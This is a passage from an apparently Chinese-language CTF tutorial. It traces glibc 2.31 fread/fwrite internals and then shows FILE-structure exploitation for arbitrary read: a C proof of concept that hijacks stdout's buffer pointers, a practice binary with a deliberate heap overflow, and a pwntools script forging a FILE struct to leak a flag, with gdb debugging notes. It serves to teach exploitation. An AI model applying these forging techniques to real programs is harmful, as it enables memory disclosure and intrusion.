並把_IO_read_ptr往上加
```c
while (want > 0)
{
have = fp->_IO_read_end - fp->_IO_read_ptr;
if (want <= have)
{
memcpy (s, fp->_IO_read_ptr, want);
fp->_IO_read_ptr += want;
want = 0;
}
```
想要讀的(want) > buffer中剩餘的(have)
如果buffer中還有剩餘的data,就先把它全部複製到目的地
並且檢查有沒有backup buffer
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L124
有的話就切換回來
```c
else
{
if (have > 0)
{
s = __mempcpy (s, fp->_IO_read_ptr, have);
want -= have;
fp->_IO_read_ptr += have;
}
/* Check for backup and repeat */
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
continue;
}
```
如果還是不夠,就看剩下要讀的量(want)是否小於整個buffer的大小,是的話就進入 `__underflow` 重新填充buffer,然後回到迴圈開頭繼續複製
```c
if (fp->_IO_buf_base && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base)) {
if (__underflow (fp) == EOF)
break;
continue;
}
```
呼叫 __underflow
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L268
```c
int
__underflow (FILE *fp)
{
if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
return EOF;
if (fp->_mode == 0)
_IO_fwide (fp, -1);
if (_IO_in_put_mode (fp))
if (_IO_switch_to_get_mode (fp) == EOF)
return EOF;
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (_IO_in_backup (fp))
{
_IO_switch_to_main_get_area (fp);
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
}
if (_IO_have_markers (fp))
{
if (save_for_backup (fp, fp->_IO_read_end))
return EOF;
}
else if (_IO_have_backup (fp))
_IO_free_backup_area (fp);
return _IO_UNDERFLOW (fp);
}
libc_hidden_def (__underflow)
```
經過簡單檢查後,會呼叫 `_IO_UNDERFLOW`,這邊會去查vtable,發現對應到_IO_file_underflow
```c
JUMP_INIT(underflow, _IO_file_underflow),
```
_IO_file_underflow實際上呼叫到_IO_new_file_underflow
總之就是檢查
syscall read
然後刷新buffer
以便繼續讀取資料
```c
int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;
/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;
if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;
if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}
/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);
if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);
_IO_release_lock (stdout);
}
_IO_switch_to_get_mode (fp);
/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;
count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)
```
這部分是資料量太大的處理,詳情見總結
```c
/* These must be set before the sysread as we might longjmp out
waiting for input. */
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
_IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
/* Try to maintain alignment: read a whole number of blocks. */
count = want;
if (fp->_IO_buf_base)
{
size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
if (block_size >= 128)
count -= want % block_size;
}
count = _IO_SYSREAD (fp, s, count);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN;
break;
}
s += count;
want -= count;
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
}
}
return n - want;
```
總結
1. 調用 vtable 中的 _IO_XSGETN (_IO_file_xsgetn)。
1. 如果沒有 buffer,則調用 vtable 中的 _IO_DOALLOCATE (_IO_file_doallocate) 進行分配。
1. 調用 vtable 中的 _IO_SYSSTAT (_IO_file_stat) 查看文件資訊,設置 buffer 大小。
1. 使用 malloc 分配一塊區域作為 buffer。
1. 開始讀取 buffer,見下方
```
1. 當data(n)很小且小於buffer剩餘的data:
流程:
計算當前buffer內剩餘的data have(fp->_IO_read_end - fp->_IO_read_ptr)。
如果 have >= want(也就是buffer內的資料足夠滿足用戶的需求),直接將buffer的資料copy到 data 中,並更新buffer的讀取指標 fp->_IO_read_ptr。
完成資料的copy後,want 會變為 0,結束讀取流程,返回已讀取的data n - want。
簡單流程:
        確認buffer內是否有足夠的資料(have >= want)。
        若是,直接把buffer的資料copy到 data 並結束。
2. 當data(n)比buffer剩餘的data大,但仍小於buffer的最大容量:
流程:
先copybuffer內的所有資料到 data,並減少 want。
接著檢查 _IO_in_backup(fp),若有備份buffer,則切換至主要的讀取區域,繼續進行資料讀取。
再來,如果 want < (fp->_IO_buf_end - fp->_IO_buf_base),代表剩餘請求的資料比buffer容量還小,則呼叫 __underflow(fp) 補充buffer,再重複上述流程進行讀取。
中等data流程:
先讀取buffer內剩餘的資料。
如果buffer內的資料不足,嘗試補充buffer再讀取。
重複直到滿足使用者的請求或到達文件結尾。
3. 當data(n)很大,超過buffer容量:
流程:
若 want 大於buffer的最大容量,則不再使用buffer,而是直接從系統層級進行讀取,使用 _IO_SYSREAD(fp, s, count)。
在此過程中,為了提升效能,會盡量以對齊的塊數量來讀取資料(通過減少 count 來確保資料是多個完整區塊的大小)。
讀取成功後,更新 want 和 s,繼續讀取剩餘資料。
大data流程:
如果請求的資料超過buffer容量,直接syscall read
        反覆呼叫syscall read直到滿足請求
```
![image](https://hackmd.io/_uploads/B19lqdNhA.png)
### fwrite
其實基本上fwrite前面跟fread一樣,只是改成呼叫_IO_XSPUTN
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/iofwrite.c#L53
```c
size_t
_IO_fwrite (const void *buf, size_t size, size_t count, FILE *fp)
{
size_t request = size * count;
size_t written = 0;
CHECK_FILE (fp, 0);
if (request == 0)
return 0;
_IO_acquire_lock (fp);
if (_IO_vtable_offset (fp) != 0 || _IO_fwide (fp, -1) == -1)
written = _IO_sputn (fp, (const char *) buf, request);
_IO_release_lock (fp);
/* We have written all of the input in case the return value indicates
this or EOF is returned. The latter is a special case where we
simply did not manage to flush the buffer. But the data is in the
buffer and therefore written as far as fwrite is concerned. */
if (written == request || written == EOF)
return count;
else
return written / size;
}
libc_hidden_def (_IO_fwrite)
```
_IO_new_file_xsputn
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L1196
f: 一個指向文件結構體的指標。
data: 需要寫入的數據指標。
n: 要寫入的數據大小
```c
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
```
s: 將輸入的 data 轉換為字串來處理。
to_do: 要寫入的剩餘字節數,初始值為 n。
must_flush: 是否需要強制刷新buffer的標誌,初始化為 0。
count: 表示buffer中可以立即使用的空間大小。
```c
const char *s = (const char *) data;
size_t to_do = n;
int must_flush = 0;
size_t count = 0;
```
這邊先檢查要寫入的大小(n 為 0 就直接return)
接下來檢查是否設置了_IO_LINE_BUF及當前是否處於寫入模式 (_IO_CURRENTLY_PUTTING)。
補充一下,可以分為三類
full buffer -> 填滿了buffer才輸出
line buffer -> 遇到\n才輸出
no buffer -> 沒有buffer,即時輸出
再來會計算當前buffer的剩餘空間為count(_IO_buf_end - _IO_write_ptr)
如果剩餘空間大於等於要寫入的字節數,就從後往前檢查data裡是否有\n,如果有就把count調整成到最後一個\n為止的長度,並將must_flush設為1,強制刷新buffer
如果不是line buffer或不在寫入模式,就用 _IO_write_end - _IO_write_ptr 計算剩餘空間
```c
if (n <= 0)
return 0;
/* This is an optimized implementation.
If the amount to be written straddles a block boundary
(or the filebuf is unbuffered), use sys_write directly. */
/* First figure out how much space is available in the buffer. */
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
else if (f->_IO_write_end > f->_IO_write_ptr)
count = f->_IO_write_end - f->_IO_write_ptr; /* Space available. */
```
如果buffer有剩下,就將他填滿
將data複製到_IO_write_ptr ~ _IO_write_ptr+count
等待寫的data往後推count
需要寫的減count
```c
if (count > 0)
{
if (count > to_do)
count = to_do;
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
to_do -= count;
}
```
如果還有剩餘,那就代表沒有分配到buffer,或是buffer不夠大,並且也看是否需要刷新buffer,有的話就進去刷新
```c
if (to_do + must_flush > 0)
{
size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
```
接下來這部分就是刷新buffer
他呼叫的 _IO_OVERFLOW 實際上是 _IO_file_overflow
```c
JUMP_INIT(overflow, _IO_file_overflow),
```
_IO_file_overflow 又是 _IO_new_file_overflow
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L730
一樣一段一段看
f 是 FILE
ch 是 EOF
先判斷這個FILE是否被標記為不可寫入 (_IO_NO_WRITES),如果是就設置 _IO_ERR_SEEN、errno = EBADF 並回傳 EOF
```c
int
_IO_new_file_overflow (FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
```
當前不是寫入模式,或是 _IO_write_base 尚未設置時就去設置(大概就是去malloc一塊buffer,或是從讀取模式切換回寫入模式)
```c
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup,
f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
```
之後進do_write
從 f->_IO_write_base開始寫長度 f->_IO_write_ptr - f->_IO_write_base
```c
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
```
_IO_do_write 是 _IO_new_do_write
```c
int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
return (to_do == 0
|| (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/fileops.c#L430
syscall write
然後
調用 _IO_setg 將 fp 的buffer指針重設為初始狀態。
將 fp->_IO_write_base 和 fp->_IO_write_ptr 設置為buffer的開始地址 fp->_IO_buf_base,表示buffer處於可以重新寫入的狀態。
根據文件的模式(如是否為行緩衝 _IO_LINE_BUF 或不使用緩衝 _IO_UNBUFFERED),調整 fp->_IO_write_end,使其指向buffer的適當結尾
```c
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
size_t count;
if (fp->_flags & _IO_IS_APPENDING) //本來就不會設定
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base) //讀寫位置不一致
{
off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
count = _IO_SYSWRITE (fp, data, to_do);
if (fp->_cur_column && count)
fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
_IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
fp->_IO_write_end = (fp->_mode <= 0
&& (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
? fp->_IO_buf_base : fp->_IO_buf_end);
return count;
}
```
寫入量超過一個block就會進入該處理
這邊還有剩餘資料處理
```c
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
```
https://elixir.bootlin.com/glibc/glibc-2.31/source/libio/genops.c#L370
處理剩餘data
```c
size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)
```
總結
![image](https://hackmd.io/_uploads/rJIUa6q30.png)
1. n <= 0
當data n 小於等於 0 時,程式直接返回 0,不會進行任何操作。
2. data n 小於等於 buffer剩餘空間 (count)
* buffer剩餘空間 (count): 由 f->_IO_write_end - f->_IO_write_ptr 決定buffer剩餘空間大小。
* 當data小於等於剩餘的buffer空間時,程式將資料直接寫入buffer,沒有超出buffer的部分,因此不需要進行syscall write或flush。
* 程式執行流程:
* 計算剩餘的buffer空間 count。
* 將資料完全寫入buffer (__mempcpy 複製資料到 f->_IO_write_ptr)。
更新寫指針 f->_IO_write_ptr。
返回 n,表示成功寫入的資料大小。
3. data n 大於 buffer剩餘空間 (count)
* 當data超過buffer剩餘空間時,程式會首先嘗試填滿buffer,然後將剩餘的部分進行syscall write。
* 步驟:
* 計算剩餘的buffer空間 count,將 count 字節的資料寫入buffer。
* 如果資料剩餘 (to_do > 0),會進行buffer刷新(即調用 _IO_OVERFLOW),並將資料寫入底層文件。
* 嘗試寫入剩餘資料,並根據文件的塊對齊要求優化寫入(維持整塊大小的寫入以提高效能)。
* 剩餘資料由 _IO_default_xsputn 處理,進行最後的寫入操作。
* 返回總共寫入的資料大小。
4. data n 小於等於 buffer剩餘空間,但啟用行緩衝模式 (_IO_LINE_BUF)
行緩衝模式: 如果啟用行緩衝模式且當前正在寫入 (_IO_CURRENTLY_PUTTING),程式會檢查資料中是否包含換行符 ('\n')。
步驟:
* 計算buffer剩餘空間 count。
* 如果data小於等於剩餘空間,則檢查資料中是否包含換行符。
* 如果遇到換行符,設置 must_flush = 1,表示需要立即刷新buffer。
* 將資料寫入buffer直到換行符,然後執行刷新操作。
* 剩餘資料寫入後,返回成功寫入的資料大小。
5. data n 大於 buffer剩餘空間,啟用行緩衝模式
步驟:
* 先將部分資料寫入buffer直到滿。
* 當buffer空間不足時,觸發刷新,並嘗試將資料直接寫入文件。
* 檢查剩餘資料中是否有換行符,遇到換行符時觸發buffer刷新。
* 將剩餘資料按塊大小(block_size)對齊寫入。
* 返回總共寫入的資料大小。
6. data n 超過 block_size
* block_size = f->_IO_buf_end - f->_IO_buf_base,這個大小會決定每次可以寫入的最大數據量。
* 當data超過buffer塊大小時,程式會分成多個塊進行寫入,以保持區塊對齊,並優化 I/O 操作。
* 步驟:
先將部分資料寫入buffer。
buffer滿後,進行buffer刷新。
將剩餘資料按照塊大小進行對齊寫入(即寫入一整數塊的資料,保證效率)。
最後寫入剩下的資料,並更新寫指針。
返回寫入的總資料大小。
## Arbitrary Read
看完上述的source code,其實大概就會有一些如何攻擊的想法,像是如果我們能夠改掉read跟write等pointer,是不是有機會構造任意讀或任意寫
改寫vtable pointer並偽造vtable來做任意跳轉
先看這個POC
```c
#include <stdio.h>
#include <string.h>

// gcc arbitrary_read_puts.c -o arbitrary_read_puts

/*
 * Hand-written mirror of the leading fields of glibc's FILE object, used to
 * poke at stdout's buffer pointers.  It is named IO_FILE (not _IO_FILE) so it
 * cannot clash with the typedef that older glibc headers already provide.
 */
typedef struct {
    int _flags;
    char *_IO_read_ptr;
    char *_IO_read_end;
    char *_IO_read_base;
    char *_IO_write_base;
    char *_IO_write_ptr;
    char *_IO_write_end;
    char *_IO_buf_base;
    char *_IO_buf_end;
} IO_FILE;

/*
 * Demo: make puts() leak an arbitrary buffer by redirecting stdout's write
 * pointers at it before the next flush.
 */
int main(void)
{
    char buf[] = "Programmer: You can't see me\n";
    size_t len = strlen(buf);
    IO_FILE *p;

    printf("Let's Demo a arbitrary read\n");

    /* Explicit cast: FILE and IO_FILE are unrelated types to the compiler. */
    p = (IO_FILE *)stdout;

    /* read_end == write_base, so new_do_write() skips its seek branch. */
    p->_IO_read_end = buf;
    /* The flush writes the range [write_base, write_ptr). */
    p->_IO_write_base = buf;
    p->_IO_write_ptr = buf + len;
    /* buf_end == write_ptr makes the line-buffered free-space count 0. */
    p->_IO_buf_end = buf + len;

    puts("Hacker: uhhh, but I can\n");
    return 0;
}
```
他會輸出
```
Let's Demo a arbitrary read
Programmer: You can't see me
Hacker: uhhh, but I can
```
為甚麼呢?
還需要繞過甚麼?
### puts IO source code
這邊回去看puts的source code,他會調用xsputn
首先是
flag會被設置,所以會進入到該if
並且計算count
這邊為了方便可以直接讓count=0
> f->_IO_buf_end = f->_IO_write_ptr
```c
if ((f->_flags & _IO_LINE_BUF) && (f->_flags & _IO_CURRENTLY_PUTTING))
{
count = f->_IO_buf_end - f->_IO_write_ptr;
if (count >= n)
{
const char *p;
for (p = s + n; p > s; )
{
if (*--p == '\n')
{
count = p - s + 1;
must_flush = 1;
break;
}
}
}
}
```
count = 0 不會進去
```c
if (count > 0)
{
if (count > to_do)
count = to_do;
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
to_do -= count;
}
```
to_do初始設為n,大於零(若進入到上方判斷,有機會讓to_do被讀完)
呼叫_IO_OVERFLOW
```c
if (to_do + must_flush > 0)
{
size_t block_size, do_write;
/* Next flush the (full) buffer. */
if (_IO_OVERFLOW (f, EOF) == EOF)
/* If nothing else has to be written we must not signal the
caller that everything has been written. */
return to_do == 0 ? EOF : n - to_do;
/* Try to maintain alignment: write a whole number of blocks. */
block_size = f->_IO_buf_end - f->_IO_buf_base;
do_write = to_do - (block_size >= 128 ? to_do % block_size : 0);
if (do_write)
{
count = new_do_write (f, s, do_write);
to_do -= count;
if (count < do_write)
return n - to_do;
}
/* Now write out the remainder. Normally, this will fit in the
buffer, but it's somewhat messier for line-buffered files,
so we let _IO_default_xsputn handle the general case. */
if (to_do)
to_do -= _IO_default_xsputn (f, s+do_write, to_do);
}
return n - to_do;
```
stdout 不會設置 _IO_NO_WRITES,不會進
```c
int
_IO_new_file_overflow (FILE *f, int ch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
```
_IO_CURRENTLY_PUTTING預設有設定,另外_IO_write_base在利用時候,不會為空,所以不會進以下if
```c
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
/* Otherwise must be currently reading.
If _IO_read_ptr (and hence also _IO_read_end) is at the buffer end,
logically slide the buffer forwards one block (by setting the
read pointers to all point at the beginning of the block). This
makes room for subsequent output.
Otherwise, set the read pointers to _IO_read_end (leaving that
alone, so it can continue to correspond to the external position). */
if (__glibc_unlikely (_IO_in_backup (f)))
{
size_t nbackup = f->_IO_read_end - f->_IO_read_ptr;
_IO_free_backup_area (f);
f->_IO_read_base -= MIN (nbackup,
f->_IO_read_base - f->_IO_buf_base);
f->_IO_read_ptr = f->_IO_read_base;
}
if (f->_IO_read_ptr == f->_IO_buf_end)
f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
f->_IO_write_ptr = f->_IO_read_ptr;
f->_IO_write_base = f->_IO_write_ptr;
f->_IO_write_end = f->_IO_buf_end;
f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;
f->_flags |= _IO_CURRENTLY_PUTTING;
if (f->_mode <= 0 && f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
f->_IO_write_end = f->_IO_write_ptr;
}
```
進
```c
if (ch == EOF)
return _IO_do_write (f, f->_IO_write_base,
f->_IO_write_ptr - f->_IO_write_base);
```
_IO_IS_APPENDING 不會設定,不會進
下方的read跟write需要設定成一樣,這樣才不會因為進入該判斷式,去重新定位_IO_write_base,導致利用失敗
> fp->_IO_read_end = fp->_IO_write_base
這樣就繞過
```c
static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
size_t count;
if (fp->_flags & _IO_IS_APPENDING)
/* On a system without a proper O_APPEND implementation,
you would need to sys_seek(0, SEEK_END) here, but is
not needed nor desirable for Unix- or Posix-like systems.
Instead, just indicate that offset (before and after) is
unpredictable. */
fp->_offset = _IO_pos_BAD;
else if (fp->_IO_read_end != fp->_IO_write_base)
{
off64_t new_pos
= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
if (new_pos == _IO_pos_BAD)
return 0;
fp->_offset = new_pos;
}
```
最後syscall就成功了
所以上方我把該設定的設好,該等於的設好,最後把p->_IO_write_base設定到要讀的地方,結束也設定好,就可以構造任意讀
```
p = stdout;
p->_IO_read_end = buf;
p->_IO_write_base = buf;
p->_IO_write_ptr = buf + strlen(buf);
p->_IO_buf_end = buf + strlen(buf);
```
### 題目
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
// gcc aar.c -o aar -g -no-pie
// Practice target for the arbitrary-read technique.
// The oversized read() below is the bug the exploit relies on; it is kept
// on purpose.
char flag[0x10] = "FLAG{TEST}\n";
int main()
{
FILE *fp;
char *buf;
// 0x10-byte heap buffer, allocated before the stream is opened.
buf = malloc(0x10);
fp = fopen("/tmp/meow", "w");
// Reads up to 0x1000 bytes into the 0x10-byte buffer (heap overflow).
read(0, buf, 0x1000);
// Writes one 0x10-byte item from buf through fp.
fwrite(buf, 0x10, 1, fp);
return 0;
}
```
我們要利用fwrite來做任意讀
fp 這個指標本身在stack上,但它指向的FILE結構是fopen在heap上malloc出來的
並且我們有heap overflow,可以從buf一路覆蓋到fp所指向的FILE結構來做任意讀
那我們要怎麼偽造
p->_IO_read_end = 想要讀的address;
p->_IO_write_base = 想要讀的address;
p->_IO_write_ptr = 想要讀的address + strlen(想要讀的);
p->_IO_buf_end = 想要讀的address + strlen(想要讀的);
fileno=1 (stdout)
flag = 0x00000800 (_IO_CURRENTLY_PUTTING)
這樣偽造一個FILE struct
然後就是算要蓋多少
buf -> malloc(0x10)實際大小0x20
而fopen會malloc一個chunk來放FILE結構,它在heap上緊鄰buf
```c
pwndbg> parseheap
addr prev size status fd bk
0x405000 0x0 0x290 Used None None
0x405290 0x0 0x20 Used None None
0x4052b0 0x0 0x1e0 Used None None
```
觀察一下記憶體,就是FILE
```
pwndbg> x/100xg 0x4052b0
0x4052b0: 0x0000000000000000 0x00000000000001e1
0x4052c0: 0x00000000fbad2484 0x0000000000000000
0x4052d0: 0x0000000000000000 0x0000000000000000
0x4052e0: 0x0000000000000000 0x0000000000000000
0x4052f0: 0x0000000000000000 0x0000000000000000
0x405300: 0x0000000000000000 0x0000000000000000
0x405310: 0x0000000000000000 0x0000000000000000
0x405320: 0x0000000000000000 0x00007ffff7e1b6a0
0x405330: 0x0000000000000003 0x0000000000000000
0x405340: 0x0000000000000000 0x00000000004053a0
```
```c
pwndbg> p *fp
$2 = {
_flags = -72539004,
_IO_read_ptr = 0x0,
_IO_read_end = 0x0,
_IO_read_base = 0x0,
_IO_write_base = 0x0,
_IO_write_ptr = 0x0,
_IO_write_end = 0x0,
_IO_buf_base = 0x0,
_IO_buf_end = 0x0,
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7e1b6a0 <_IO_2_1_stderr_>,
_fileno = 3,
_flags2 = 0,
_old_offset = 0,
_cur_column = 0,
_vtable_offset = 0 '\000',
_shortbuf = "",
_lock = 0x4053a0,
_offset = -1,
_codecvt = 0x0,
_wide_data = 0x4053b0,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0,
_mode = 0,
_unused2 = '\000' <repeats 19 times>
}
```
當我設定完成
0x0 0x0
0x0 0x1e1
...
p->_IO_read_end = 想要讀的address;
p->_IO_write_base = 想要讀的address;
p->_IO_write_ptr = 想要讀的address + strlen(想要讀的);
p->_IO_buf_end = 想要讀的address + strlen(想要讀的);
fileno=1 (stdout)
flag = 0x00000800 (_IO_CURRENTLY_PUTTING)
後並送出
```python=
from pwn import *
from NAUP_pwn_lib import *
import time

# Short aliases for the pwntools tube `r` that is created below.
def s(payload): return r.send(payload)
def sl(payload): return r.sendline(payload)
def sla(after, payload): return r.sendlineafter(after, payload)
def sa(after, payload): return r.sendafter(after, payload)
def rc(num): return r.recv(num)
def rcl(): return r.recvline()
def rcls(num): return r.recvlines(num)
def rcu(payload): return r.recvuntil(payload)
def ita(): return r.interactive()
def cl(): return r.close()
def tsl(): return time.sleep(0.2)

context(arch = 'amd64', os = 'linux')

# Choose between the local binary and the remote service.
REMOTE_LOCAL=input("local?(y/n):")
if REMOTE_LOCAL=="y":
    r=process('./aar')
    debug_init()
else:
    REMOTE_INFO=split_nc("nc naup.com 2000")
    REMOTE_IP=REMOTE_INFO[0]
    REMOTE_PORT=int(REMOTE_INFO[1])
    r=remote(REMOTE_IP,REMOTE_PORT)

### exploit
flag_addr = 0x404050
# NOTE: lock_addr is defined but not applied to the fake FILE in this
# first attempt.
lock_addr = 0x404a00
# 0x10 bytes filling buf, then the next chunk's prev_size (0) and size (0x1e1).
padding = flat(0x0,0x0,0x0,0x1e1)
f = FileStructure(0)
f.flags = 0x00000800          # _IO_CURRENTLY_PUTTING
f._IO_read_end = flag_addr    # equal to _IO_write_base
f._IO_write_base = flag_addr  # start of the range to leak
f._IO_buf_end = flag_addr + 0x10
f._IO_write_ptr = flag_addr + 0x10  # end of the range to leak
f.fileno = 1                  # write to stdout
# Drop the last 8 bytes of the serialized structure.
payload = padding + bytes(f)[:-8]
s(payload)
###
ita()
```
爛了,遇事不決,gdb開起來
![image](https://hackmd.io/_uploads/B1kg6Zs2A.png)
他死在這裡rdi+0x8,是個指標
我一個個慢慢測後發現他是 _lock
我隨便將他設成一個合理的address就可以了
其實還有個方法就是不要蓋到_lock,我這邊選擇填一個合法的空address
另外要把vtable切掉,不然動到vtable pointer會吃保護然後crash
exploit
```python=
from pwn import *
from NAUP_pwn_lib import *
import time
from NAUP_filestructure_lib import *

